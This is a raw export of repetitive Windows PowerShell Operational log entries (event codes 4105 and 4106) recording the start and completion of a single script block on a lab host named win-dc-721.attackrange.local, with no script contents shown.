EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472104
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472103
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472102
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472101
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472100
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472099
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472098
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472097
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472096
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472095
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472094
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472093
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472092
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472091
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472090
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472089
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472088
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472087
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472086
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472085
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472084
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472083
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472082
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472081
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472080
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472079
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472078
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472077
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472076
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472075
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472074
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472073
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472072
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472071
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472070
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472069
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472068
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472067
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472066
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472065
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472064
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472063
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472062
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472061
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472060
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472059
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472058
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472057
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472056
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472055
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472054
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472053
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472052
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1472051
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1472050
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
